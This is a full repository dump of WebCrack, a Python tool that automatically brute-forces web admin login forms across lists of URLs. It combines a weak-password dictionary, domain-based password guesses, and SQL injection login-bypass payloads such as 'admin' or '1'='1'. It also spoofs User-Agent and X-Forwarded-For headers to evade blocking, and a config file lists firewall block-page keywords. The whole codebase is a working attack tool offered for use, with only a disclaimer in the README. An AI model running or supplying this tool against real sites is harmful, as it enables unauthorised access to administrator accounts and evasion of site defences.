Full Code of yzddmr6/WebCrack for AI

Repository: yzddmr6/WebCrack
Branch: master
Commit: eb64610f3352
Files: 17
Total size: 24.7 KB

Directory structure:
gitextract_00mb4rd0/

├── .gitignore
├── README.md
├── conf/
│   ├── __init__.py
│   ├── config.py
│   └── password_list.txt
├── crack/
│   ├── __init__.py
│   └── crack_task.py
├── generator/
│   ├── __init__.py
│   ├── dict.py
│   └── header.py
├── logs/
│   ├── __init__.py
│   └── log.py
├── parse/
│   ├── __init__.py
│   └── parser.py
├── requirements.txt
├── url.txt
└── webcrack.py

================================================
FILE CONTENTS
================================================

================================================
FILE: .gitignore
================================================
/.idea/
/logs/20*
*.pyc
*test*

================================================
FILE: README.md
================================================
# WebCrack `v(2.2)`

## 工具简介

WebCrack是一款web后台弱口令/万能密码批量检测工具，在工具中导入后台地址即可进行自动化检测。


## 开发文档

https://yzddmr6.com/posts/webcrack-release/

## 更新日志

### 2021/07/27 `v(2.2)`

* 修复后台页面没有action字段导致的解析问题

* 配置文件字典改为加载txt方式

### 2021/03/15 `v(2.1)`

* 修复目标为IP时字典生成失败的BUG

### 2021/02/22 `v(2.0)`

* 代码重构，解耦，面向对象

* `conf/config.py`中可以自定义全局参数

* 去掉预请求，优化核心判断逻辑

* 修复部分BUG

### 2020/02/25 `v(1.1)`

代码准备全部重构，先发一个修复BUG的临时版本

* 优化核心判断逻辑

* 修复两处表单识别问题

* 增加黑名单关键字

### 2019/09/09 `v(1.0)`

* 项目开源

## 工具特点

* 多重判断机制，减少误报

* 随机UA 随机X-Forwarded-For 随机Client-IP

* 可以通过域名生成动态字典

* 可以检测万能密码漏洞

* 支持自定义爆破规则

## 使用方法

下载项目
```
git clone https://github.com/yzddmr6/WebCrack
```

安装依赖
```
pip install -r requirements.txt
```

运行脚本
```
> python3 webcrack.py

+---------------------------------------------------+
| __          __  _      _____                _     |
| \ \        / / | |    / ____|              | |    |
|  \ \  /\  / /__| |__ | |     _ __ __ _  ___| | __ |
|   \ \/  \/ / _ \ '_ \| |    | '__/ _' |/ __| |/ / |
|    \  /\  /  __/ |_) | |____| | | (_| | (__|   <  |
|     \/  \/ \___|_.__/ \_____|_|  \__,_|\___|_|\_\ |
|                                                   |
|                 code by @yzddmr6                  |
|                  version: 2.1                     |
+---------------------------------------------------+

File or Url:

```

输入文件名则进行批量爆破，输入URL则进行单域名爆破。

开始爆破

![image-20210222154621129](README.assets/image-20210222154621129.png)


爆破的结果会保存在`logs/{date}/`文件夹中

![image](https://user-images.githubusercontent.com/46088090/64511693-6a248e80-d317-11e9-9d0c-6114cb194d37.png)


## 自定义配置文件

参数详情见`conf/config.py`文件注释

## 警告！

**请勿用于非法用途！否则自行承担一切后果**


================================================
FILE: conf/__init__.py
================================================
import sys, os

sys.path.append(os.path.dirname(os.path.dirname(os.path.abspath(__file__))))


================================================
FILE: conf/config.py
================================================
import os


def txt2list(txt):
    ret = []
    path = os.path.join(os.path.dirname(os.path.abspath(__file__)), txt)
    with open(path, "r", encoding="UTF-8") as f:
        for line in f.readlines():
            ret.append(line.strip())
    return ret


logConfig = {
    "log_filename": "logs.txt",  # 普通日志文件名称
    "success_filename": "success.txt",  # 成功日志文件名称
}

crackConfig = {
    "timeout": 10,  # 超时时间
    "delay": 0.03,  # 每次请求之后sleep的间隔
    "test_username": "admin",  # 测试用户名
    "test_password": "length_test",  # 测试密码
    "requests_proxies": {  # 请求代理
        # "http": "127.0.0.1:8080",
        # "https": "127.0.0.1:8080"
    },
    "fail_words": ['密码错误', '重试', '不正确', '密码有误', '不成功', '重新输入', '不存在', '登录失败', '登陆失败', '密码或安全问题错误', 'history.go',
                   'history.back',
                   '已被锁定', '安全拦截', '还可以尝试', '无效', '攻击行为', '创宇盾', 'http://zhuji.360.cn/guard/firewall/stopattack.html',
                   'D盾_拦截提示', '用户不存在',
                   '非法', '百度云加速', '安全威胁', '防火墙', '黑客', '不合法', 'Denied', '尝试次数',
                   'http://safe.webscan.360.cn/stopattack.html', "Illegal operation", "服务器安全狗防护验证页面"]  # 黑名单关键字
}
generatorConfig = {
    "dict_config": {
        "base_dict": {
            "username_list": ['admin'],  # 爆破用户名字典
            "password_list": txt2list("password_list.txt")  # 爆破密码字典

        },
        "domain_dict": {
            "enable": True,
            "suffix_list": [  # 动态生成域名字典后缀
                "",
                "123",
                "666",
                "888",
                "123456"
            ],

        },
        "sqlin_dict": {
            "enable": True,
            "payload_list": [  # 万能密码列表
                "admin' or 'a'='a",
                "'or'='or'",
                "admin' or '1'='1' or 1=1",
                "')or('a'='a",
                "'or 1=1 -- -"
            ],
        }
    },
    "headers_config": {
        "enable": True,
        "useragent_list": [
            "Mozilla/5.0 (Windows; U; Win98; en-US; rv:1.8.1) Gecko/20061010 Firefox/2.0",
            "Mozilla/5.0 (Windows; U; Windows NT 5.0; en-US) AppleWebKit/532.0 (KHTML, like Gecko) Chrome/3.0.195.6 Safari/532.0",
            "Mozilla/5.0 (Windows; U; Windows NT 5.1 ; x64; en-US; rv:1.9.1b2pre) Gecko/20081026 Firefox/3.1b2pre",
            "Opera/10.60 (Windows NT 5.1; U; zh-cn) Presto/2.6.30 Version/10.60",
            "Opera/8.01 (J2ME/MIDP; Opera Mini/2.0.4062; en; U; ssr)",
            "Mozilla/5.0 (Windows; U; Windows NT 5.1; ; rv:1.9.0.14) Gecko/2009082707 Firefox/3.0.14",
            "Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36",
            "Mozilla/5.0 (Windows; U; Windows NT 6.0; fr; rv:1.9.2.4) Gecko/20100523 Firefox/3.6.4 ( .NET CLR 3.5.30729)",
            "Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/528.16 (KHTML, like Gecko) Version/4.0 Safari/528.16",
            "Mozilla/5.0 (Windows; U; Windows NT 6.0; fr-FR) AppleWebKit/533.18.1 (KHTML, like Gecko) Version/5.0.2 Safari/533.18.5"
        ],
        "default_headers": {
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'User-Agent': "WebCrack Test",
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.8',
            "Referer": "http://www.baidu.com/",
            'Content-Type': 'application/x-www-form-urlencoded'}
    }
}
parserConfig = {
    "default_value": "0000",  # 当参数没有value时的默认填充值
    "username_keyword_list": [  # 用户名参数关键字列表
        "user",
        "name",
        "zhanghao",
        "yonghu",
        "email",
        "account",
    ],
    "password_keyword_list": [  # 密码参数关键字列表
        "pass",
        "pw",
        "mima"
    ],

    "captcha_keyword_list": [  # 验证码关键字列表
        "验证码",
        "captcha",
        "验 证 码",
        "点击更换",
        "点击刷新",
        "看不清",
        "认证码",
        "安全问题"
    ],

    "login_keyword_list": [  # 检测登录页面关键字
        "用户名",
        "密码",
        "login",
        "denglu",
        "登录",
        "user",
        "pass",
        "yonghu",
        "mima",
        "admin",
    ],

}
cmsConfig = {
    "discuz": {
        "name": "discuz",  # cms名称
        "keywords": "admin_questionid",  # cms页面指纹关键字
        "captcha": 0,  # 是否存在验证码
        "sqlin_able": 0,  # 是否存在后台sql注入
        "success_flag": "admin.php?action=logout",  # 登录成功关键字
        "die_flag": "密码错误次数过多",  # 若填写此项，遇到其中的关键字就会退出爆破，用于dz等对爆破次数有限制的cms
        "alert": 0,  # 若为1则会打印下面note的内容
        "note": "discuz论坛测试"
    },
    "dedecms": {
        "name": "dedecms",
        "keywords": "newdedecms",
        "captcha": 0,
        "sqlin_able": 0,
        "success_flag": "",
        "die_flag": "",
        "alert": 0,
        "note": "dedecms测试"
    },
    "phpweb": {
        "name": "phpweb",
        "keywords": "width:100%;height:100%;background:#ffffff;padding:160px",
        "captcha": 0,
        "sqlin_able": 1,
        "success_flag": "admin.php?action=logout",
        "die_flag": "",
        "alert": 1,
        "note": "存在 phpweb 万能密码 : admin' or '1' ='1' or '1'='1"
    },
    "ecshop": {
        "name": "ecshop",
        "keywords": "validator.required('username', user_name_empty);",
        "captcha": 0,
        "sqlin_able": 0,
        "success_flag": "ECSCP[admin_pass]",
        "die_flag": "",
        "alert": 0,
        "note": "ecshop测试"
    },
    "phpmyadmin": {
        "name": "phpmyadmin",
        "keywords": "pma_username",
        "captcha": 0,
        "sqlin_able": 0,
        "success_flag": "db_structure.php",
        "die_flag": "",
        "alert": 0,
        "note": "phpmyadmin测试"
    }
}


================================================
FILE: conf/password_list.txt
================================================
{user}
123456
{user}888
12345678
123123
88888888
888888
password
123456a
{user}123
{user}123456
{user}666
{user}2018
123456789
654321
666666
66666666
1234567890
8888888
987654321
0123456789
12345
1234567
000000
111111
5201314
123123

================================================
FILE: crack/__init__.py
================================================


================================================
FILE: crack/crack_task.py
================================================
import requests

from generator.dict import *
from generator.header import get_random_headers
from conf.config import *
import logs.log as Log
from parse.parser import Parser
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
import time


def get_res_length(res):
    # return len(res.text + str(res.headers))
    return len(res.text)


class CrackTask:
    id = 0
    url = ''
    parser = {}
    error_length = 0
    requests_proxies = {}
    timeout = 0
    fail_words = []
    test_username = ''
    test_password = ''
    conn = {}

    def __init__(self):
        # 加载配置文件
        self.requests_proxies = crackConfig["requests_proxies"]
        self.timeout = crackConfig["timeout"]
        self.fail_words = crackConfig["fail_words"]
        self.test_username = crackConfig["test_username"]
        self.test_password = crackConfig["test_password"]

    def run(self, id, url):
        self.id = id
        self.url = url
        print("")
        Log.init_log_id(id)
        Log.Info(f"[*] Start: {url}")
        try:
            self.parser = Parser(self.url)
            if not self.parser.run():
                return
            self.error_length = self.get_error_length()
            username_dict, password_dict = gen_dict(url)
            username, password = self.crack_task(username_dict, password_dict)
            # 万能密码爆破
            if not username and not password:
                if self.parser.cms:
                    sqlin_dict_enable = self.parser.cms["sqlin_able"]
                else:
                    sqlin_dict_enable = generatorConfig["dict_config"]["sqlin_dict"]["enable"]
                if sqlin_dict_enable:
                    Log.Info(f"[*] {url} 启动万能密码爆破模块")
                    sqlin_user_dict, sqlin_pass_dict = gen_sqlin_dict()
                    username, password = self.crack_task(sqlin_user_dict, sqlin_pass_dict)

            if username and password:
                Log.Info(f"[*] Rechecking... {url} {username} {password}")
                recheck_flag = self.recheck(username, password)
                if recheck_flag:
                    Log.Success(f"[+] Success: {url}  {username}/{password}")
                    return
                else:
                    Log.Info(f"[-] Recheck failed: {url}  {username}/{password}")
            Log.Error("[-] Failed: " + url)
        except Exception as e:
            Log.Error(f"{str(e)}")

    def crack_request(self, conn, username, password):
        data = self.parser.data
        path = self.parser.post_path
        data[self.parser.username_keyword] = username
        data[self.parser.password_keyword] = password
        res = conn.post(url=path, data=data, headers=get_random_headers(), timeout=self.timeout, verify=False,
                        allow_redirects=True, proxies=self.requests_proxies)
        time.sleep(crackConfig["delay"])
        res.encoding = res.apparent_encoding
        return res

    def get_error_length(self):
        conn = requests.session()
        self.conn = conn
        # pre_res = self.crack_request(conn, self.test_username, self.test_password)  # 预请求一次
        res1 = self.crack_request(conn, self.test_username, self.test_password)
        res2 = self.crack_request(conn, self.test_username, self.test_password)
        error_length1 = get_res_length(res1)
        error_length2 = get_res_length(res2)
        if error_length1 != error_length2:
            raise Exception(f"[-] {self.url} Error length 不为固定值")
        return error_length1

    def recheck(self, username, password):
        password = password.replace('{user}', username)
        conn = requests.session()
        # pre_res = self.crack_request(conn, self.test_username, self.test_password)  # 预请求一次
        res1 = self.crack_request(conn, self.test_username, self.test_password)
        res2 = self.crack_request(conn, username, password)
        error_length1 = get_res_length(res1)
        error_length2 = get_res_length(res2)

        if error_length1 == error_length2 or res2.status_code == 403:
            return False
        else:
            return True

    def crack_task(self, username_dict, password_dict):
        fail_words = self.fail_words
        conn = self.conn
        error_length = self.error_length
        num = 0
        dic_all = len(username_dict) * len(password_dict)
        for username in username_dict:
            for password in password_dict:
                right_pass = 1
                password = password.replace('{user}', username)
                num = num + 1
                Log.Info(f"[*] {self.url} 进度: ({num}/{dic_all}) checking: {username} {password}")
                res = self.crack_request(conn, username, password)
                html = res.text + str(res.headers)
                if self.parser.cms:
                    if self.parser.cms["success_flag"] and (self.parser.cms["success_flag"] in html):
                        return username, password
                    elif self.parser.cms["die_flag"] and (self.parser.cms["die_flag"] in html):
                        return False, False
                for fail_word in fail_words:
                    if fail_word in html:
                        right_pass = 0
                        break
                if right_pass:
                    cur_length = get_res_length(res)
                    if self.parser.username_keyword in res.text and self.parser.password_keyword in res.text:
                        continue
                    if cur_length != error_length:
                        return username, password
                else:
                    continue
        return False, False


================================================
FILE: generator/__init__.py
================================================


================================================
FILE: generator/dict.py
================================================
import re
from conf.config import *


def gen_dict(url):
    username_list, password_list = gen_base_dict()
    if generatorConfig["dict_config"]["domain_dict"]["enable"]:
        domain_user_dict, domain_pass_dict = gen_domain_dict(url)
        if domain_user_dict and domain_pass_dict:
            username_list.extend(domain_user_dict)
            password_list.extend(domain_pass_dict)
    if username_list and password_list:
        return username_list, password_list
    else:
        raise Exception("[-] 字典生成失败！")


def gen_sqlin_dict():
    sqlin_user_dict = generatorConfig["dict_config"]["sqlin_dict"]["payload_list"]
    sqlin_pass_dict = sqlin_user_dict
    return sqlin_user_dict, sqlin_pass_dict


def gen_base_dict():
    base_username_list = generatorConfig["dict_config"]["base_dict"]["username_list"].copy()
    base_password_list = generatorConfig["dict_config"]["base_dict"]["password_list"].copy()
    return base_username_list, base_password_list


def gen_domain_dict(url):
    domain_user_dict = []
    domain_pass_dict = []
    tmp_dict = []
    suffix_list = generatorConfig["dict_config"]["domain_dict"]["suffix_list"]
    list1 = url.split('/')
    host = list1[2].split(":")[0]
    compile_ip = re.compile(
        '^(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|[1-9])\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)\.(1\d{2}|2[0-4]\d|25[0-5]|[1-9]\d|\d)$')
    if compile_ip.match(host):
        check_ip = 1
    else:
        check_ip = 0
    if not check_ip:
        list2 = host.split(".")
        i = len(list2)
        for u in range(i):  # 生成url字典1
            list3 = list2[u:]
            part = '.'.join(list3)
            if (len(part) < 5):
                continue
            domain_pass_dict.append(part)
        for u in range(i):  # 生成url字典2
            list3 = list2[u]
            if len(list3) < 5:
                continue
            tmp_dict.append(list3)
        for i in tmp_dict:
            for suffix in suffix_list:
                u = i + suffix
                domain_pass_dict.append(u)
        return domain_user_dict, domain_pass_dict
    else:
        return False, False


================================================
FILE: generator/header.py
================================================
import random
from conf.config import *

useragent_list = generatorConfig["headers_config"]["useragent_list"]
enable = generatorConfig["headers_config"]["enable"]


def get_random_headers():  # 生成随机headers
    if enable:
        UA = random.choice(useragent_list)
        a = str(random.randint(1, 255))
        b = str(random.randint(1, 255))
        c = str(random.randint(1, 255))
        random_XFF = '127.' + a + '.' + b + '.' + c
        random_CI = '127.' + c + '.' + a + '.' + b
        headers = {
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
            'User-Agent': UA,
            'X-Forwarded-For': random_XFF,
            'Client-IP': random_CI,
            'Accept-Encoding': 'gzip, deflate',
            'Accept-Language': 'zh-CN,zh;q=0.8',
            "Referer": "http://www.baidu.com/",
            'Content-Type': 'application/x-www-form-urlencoded'}
    else:
        headers = generatorConfig["rand_headers_config"]["default_headers"]

    return headers


================================================
FILE: logs/__init__.py
================================================


================================================
FILE: logs/log.py
================================================
import time, os
from conf.config import *

date = time.strftime('%Y-%m-%d', time.localtime(time.time()))
log_dir = os.path.join(os.path.dirname(os.path.abspath(__file__)), date)
if not os.path.exists(log_dir):
    os.mkdir(log_dir)

success_filename = os.path.join(log_dir, logConfig["success_filename"])
log_filename = os.path.join(log_dir, logConfig["log_filename"])
lock = {}
id = ''


def init_lock(l):
    global lock
    lock = l


def init_log_id(i):
    global id
    id = i


def get_time():
    return time.strftime('%Y-%m-%d %X', time.localtime(time.time()))


def write_log(filename, msg):
    if lock:
        with lock:
            with open(filename, "a+", encoding="UTF-8") as log:
                log.write(msg + "\n")
    else:
        with open(filename, "a+", encoding="UTF-8") as log:
            log.write(msg + "\n")


def Info(msg):
    current_time = get_time()
    if id:
        msg = f"{current_time}  id: {id} {str(msg)}"
    else:
        msg = f"{current_time}  {str(msg)}"
    print(msg)


def Error(msg):
    current_time = get_time()
    if id:
        msg = f"{current_time}  id: {id} {str(msg)}"
    else:
        msg = f"{current_time}  {str(msg)}"
    print(msg)
    write_log(log_filename, msg)


def Success(msg):
    current_time = get_time()
    if id:
        msg = f"{current_time}  id: {id} {str(msg)}"
    else:
        msg = f"{current_time}  {str(msg)}"
    print(msg)
    write_log(success_filename, msg)


================================================
FILE: parse/__init__.py
================================================


================================================
FILE: parse/parser.py
================================================
from urllib.parse import urlparse
from conf.config import *
import requests
from bs4 import BeautifulSoup as BS
import re
from generator.header import get_random_headers
import logs.log as Log
from requests.packages.urllib3.exceptions import InsecureRequestWarning

requests.packages.urllib3.disable_warnings(InsecureRequestWarning)


class Parser:
    id = 0
    url = ''
    post_path = ''
    resp_content = ''
    form_content = ''
    username_keyword = ''
    password_keyword = ''
    data = ''
    cms = ''

    def __init__(self, url):
        self.url = url
        self.requests_proxies = crackConfig["requests_proxies"]

    def run(self):
        try:
            self.get_resp_content()
            self.cms_parser()
            self.form_parser()
            self.check_login_page()
            self.captcha_parser()
            self.post_path_parser()
            self.param_parser()
        except Exception as e:
            Log.Error(f"[-] {self.url} Parse Error: " + str(e))
            return False
        return True

    def get_resp_content(self):
        res = requests.get(self.url, timeout=crackConfig["timeout"], verify=False, headers=get_random_headers(),
                           proxies=self.requests_proxies)
        res.encoding = res.apparent_encoding
        self.resp_content = res.text

    def cms_parser(self):
        for cms in cmsConfig.values():
            keyword = cms["keywords"]
            if keyword and (keyword in self.resp_content):
                Log.Info(f"[*] {self.url} 识别到cms: {cms['name']}")
                if cms['alert']:
                    Log.Info(f"[*] {self.url} {cms['note']}")
                self.cms = cms

    def form_parser(self):
        html = self.resp_content
        result = re.findall(".*<form (.*)</form>.*", html, re.S)
        if result:
            form_data = '<form ' + result[0] + ' </form>'
            form_soup = BS(form_data, "lxml")
            self.form_content = form_soup.form
        else:
            raise Exception("Can not get form")

    def check_login_page(self):
        login_keyword_list = parserConfig["login_keyword_list"]
        for login_keyword in login_keyword_list:
            if login_keyword in str(self.form_content).lower():
                return True
        raise Exception("Maybe not login pages")

    def captcha_parser(self):
        captcha_keyword_list = parserConfig["captcha_keyword_list"]
        for captcha in captcha_keyword_list:
            if captcha in self.resp_content.lower():
                raise Exception(f"{captcha} in login page")

    def post_path_parser(self):
        url = self.url
        content = self.form_content
        form_action = str(content).split('\n')[0]
        soup = BS(form_action, "lxml")
        res = urlparse(url)
        try:
            action_path = soup.form['action']
        except:
            self.post_path = url  # 当form中没有action字段时，默认地址为url
            return

        if action_path.startswith('http'):  # action为绝对路径
            path = action_path
        elif action_path.startswith('/'):  # action为根路径
            root_path = res.scheme + '://' + res.netloc
            path = root_path + action_path
        elif action_path == '':  # action为空
            path = url
        else:  # action为同目录下相对路径
            relative_path = url.rstrip(url.split('/')[-1])
            path = relative_path + action_path
        if not path:
            raise Exception("Can not get post path")
        self.post_path = path

    def param_parser(self):
        content = self.form_content
        data = {}
        username_keyword = ''
        password_keyword = ''
        username_keyword_list = parserConfig["username_keyword_list"]
        password_keyword_list = parserConfig["password_keyword_list"]
        for input_element in content.find_all('input'):
            if input_element.has_attr('name'):
                parameter = input_element['name']
            else:
                parameter = ''
            if input_element.has_attr('value'):
                value = input_element['value']
            else:
                value = parserConfig["default_value"]
            if parameter:
                data[parameter] = value

        # 提取username_keyword,password_keyword
        for parameter in data:
            if not username_keyword and parameter != password_keyword:
                for keyword in username_keyword_list:
                    if keyword in parameter.lower():
                        username_keyword = parameter
                        break
            if not password_keyword and parameter != username_keyword:
                for keyword in password_keyword_list:
                    if keyword in parameter.lower():
                        password_keyword = parameter
                        break

        # 弹出reset
        for i in ['reset']:
            for r in list(data.keys()):
                if i in r.lower():
                    data.pop(r)

        if username_keyword and password_keyword:
            self.username_keyword = username_keyword
            self.password_keyword = password_keyword
            self.data = data
        else:
            raise Exception("Can not get login parameter")


================================================
FILE: requirements.txt
================================================
bs4
lxml
requests

================================================
FILE: url.txt
================================================
#若为#开头则忽略此行
http://www.baidu.cn/login.asp
http://www.baidu.cn/login.aspx
http://www.baidu.cn/login.php
http://www.baidu.cn/login.jsp

================================================
FILE: webcrack.py
================================================
import os
import datetime

from crack.crack_task import CrackTask

author_info = '''
+---------------------------------------------------+
| __          __  _      _____                _     |
| \ \        / / | |    / ____|              | |    |
|  \ \  /\  / /__| |__ | |     _ __ __ _  ___| | __ |
|   \ \/  \/ / _ \ '_ \| |    | '__/ _' |/ __| |/ / |
|    \  /\  /  __/ |_) | |____| | | (_| | (__|   <  |
|     \/  \/ \___|_.__/ \_____|_|  \__,_|\___|_|\_\ |
|                                                   |
|                 code by @yzddmr6                  |
|                  version: 2.2                     |
+---------------------------------------------------+
'''


def single_process_crack(url_list):
    all_num = len(url_list)
    cur_num = 1
    print("总任务数: " + str(all_num))
    for url in url_list:
        CrackTask().run(cur_num, url)
        cur_num += 1


if __name__ == '__main__':
    print(author_info)
    try:
        import conf.config
    except:
        print("加载配置文件失败！")
        exit(0)

    url_file_name = input('File or Url:\n')

    if '://' in url_file_name:
        CrackTask().run(1, url_file_name)
    else:
        url_list = []
        if os.path.exists(url_file_name):
            print(url_file_name, "exists!\n")
            with open(url_file_name, 'r', encoding="UTF-8") as url_file:
                for url in url_file.readlines():
                    url = url.strip()
                    if url.startswith('#') or url == '' or ('.edu.cn' in url) or ('.gov.cn' in url):
                        continue
                    url_list.append(url)
            start = datetime.datetime.now()
            single_process_crack(url_list)
            end = datetime.datetime.now()
            print(f'All processes done! Cost time: {str(end - start)}')
        else:
            print(url_file_name + " not exist!")
            exit(0)